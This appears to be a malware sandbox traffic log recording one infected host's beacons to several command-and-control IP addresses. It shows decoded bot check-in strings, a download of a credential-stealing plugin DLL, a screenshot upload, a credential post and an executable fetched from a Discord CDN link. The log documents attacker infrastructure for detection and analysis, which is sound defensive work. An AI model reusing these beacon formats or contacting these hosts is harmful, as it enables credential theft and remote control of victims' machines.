                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.32.200.113Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 36 35 36 66 30 33 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.63&sd=656f03&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTY5MDUzHost: 45.32.200.113Content-Length: 169205Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: GET /mBsjv2swweP/Plugins/cred64.dll HTTP/1.1Host: 45.32.200.113
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: GET /attachments/1059906296494686404/1060299047027613706/2.0.3-beta.exe HTTP/1.1Host: cdn.discordapp.com
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /mBsjv2swweP/index.php HTTP/1.1Host: 45.32.200.113Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /Nmkn5d9Dn/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.109Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 33 26 73 64 3d 62 35 34 61 64 37 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 30 Data Ascii: id=853321935212&vs=3.63&sd=b54ad7&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=0
                                Source: global trafficHTTP traffic detected: POST /g8kdkeXs2qL/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 45.66.230.123Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 35 26 73 64 3d 32 31 65 61 62 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 36 31 30 39 33 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.65&sd=21eabf&os=1&bi=1&ar=0&pc=610930&un=user&dm=&av=13&lv=0&og=1
